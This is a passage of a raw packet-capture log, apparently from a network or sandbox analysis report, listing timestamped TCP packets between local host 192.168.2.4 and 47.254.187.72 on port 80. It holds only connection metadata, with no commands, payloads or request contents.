                                                                            Jan 2, 2025 20:34:55.236138105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.236141920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.236177921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.239583969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.239593029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.239598989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.239613056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.239623070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.239633083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.239635944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.239655018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.239670992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.241234064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.241262913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.241272926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.241283894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.241287947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.241312027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.244504929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.244524002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.244532108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.244541883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.244568110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.244585037 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.246238947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.246249914 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.246259928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.246270895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.246283054 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.246325016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.247875929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.247885942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.247903109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.247912884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.247919083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.247921944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.247936964 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.247956038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.251676083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.251693010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.251708984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.251714945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.251719952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.251730919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.251748085 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.251758099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.253210068 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.253221035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.253231049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.253242016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.253256083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.253263950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.253283024 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.256432056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.256458044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.256469011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.256479979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.256504059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.256535053 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.258042097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.258060932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.258071899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.258076906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.258084059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.258100033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.258121014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.261486053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.261497974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.261507988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.261533022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.261560917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.263204098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.263220072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.263230085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.263240099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.263247013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.263252020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.263286114 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.264902115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.264913082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.264923096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.264946938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.264972925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.268218994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.268244028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.268254042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.268264055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.268274069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.268280029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.268311977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.269836903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.269849062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.269859076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.269870043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.269879103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.269882917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.269918919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.273174047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.273185968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.273196936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.273206949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.273225069 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.273260117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.275137901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.275156021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.275187969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.275250912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.275259972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.275270939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.275283098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.275300980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.276603937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.276614904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.276624918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.276699066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.279830933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.279917955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.279989958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.279999018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.280000925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.280011892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.280021906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.280023098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.280054092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.281764030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.281774998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.281785011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.281795025 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.281806946 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.281850100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.285048962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.285059929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.285074949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.285085917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.285094976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.285096884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.285157919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.286859035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.286870003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.286880970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.286890984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.286906958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.286928892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.288496017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.288505077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.288520098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.288531065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.288539886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.288547993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.288578033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.291748047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.291806936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.291816950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.291826963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.291836023 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.291836977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.291882038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.293582916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.293593884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.293603897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.293613911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.293632984 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.293646097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.421174049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.421190977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.421200991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.421214104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.421222925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.421257973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.421294928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.424366951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.424386978 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.424396992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.424407959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.424423933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.424452066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.426040888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.426052094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.426062107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.426073074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.426098108 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.426117897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.427594900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.427623987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.427633047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.427635908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.427654982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.427663088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.427664042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.427699089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.430138111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.430175066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.430188894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.430198908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.430202007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.430242062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.433620930 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.433633089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.433643103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.433654070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.433686018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.433881998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.435184002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.435211897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.435221910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.435231924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.435254097 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.435273886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.438561916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.438574076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.438591003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.438600063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.438610077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.438627958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.438648939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.441121101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.441132069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.441143036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.441186905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.441205025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.442861080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.442872047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.442882061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.442889929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.442899942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.442910910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.442912102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.442950010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.444431067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.444469929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.444485903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.444503069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.444511890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.444523096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.444561958 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.447210073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.447236061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.447246075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.447258949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.447267056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.447330952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.447330952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.450839996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.450858116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.450869083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.450880051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.450896025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.450923920 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.452333927 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.452344894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.452354908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.452366114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.452373981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.452404022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.453943014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.453953028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.453963041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.453973055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.453984022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.454016924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.457223892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.457238913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.457278967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.457279921 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.457292080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.457303047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.457309961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.457340002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.458930016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.458941936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.458951950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.458962917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.458973885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.459000111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.462174892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.462228060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.462238073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.462248087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.462249041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.462260008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.462287903 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.462311983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.463915110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.463926077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.463943005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.463953972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.463958025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.463963985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.463994980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.464010954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.467268944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.467289925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.467309952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.467327118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.467344046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.467353106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.467396021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.467418909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.468883038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.468935013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.468959093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.468969107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.468980074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.468991995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.469005108 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.469058990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.470637083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.470648050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.470659971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.470670938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.470678091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.470704079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.470731974 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.474140882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.474153996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.474167109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.474178076 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.474189997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.474205017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.474240065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.475711107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.475723982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.475735903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.475745916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.475779057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.475810051 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.478990078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.479054928 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.479064941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.479075909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.479087114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.479135990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.480711937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.480724096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.480734110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.480823040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:55.482599020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.482615948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.482626915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:55.482637882 CET804973047.254.187.72192.168.2.4
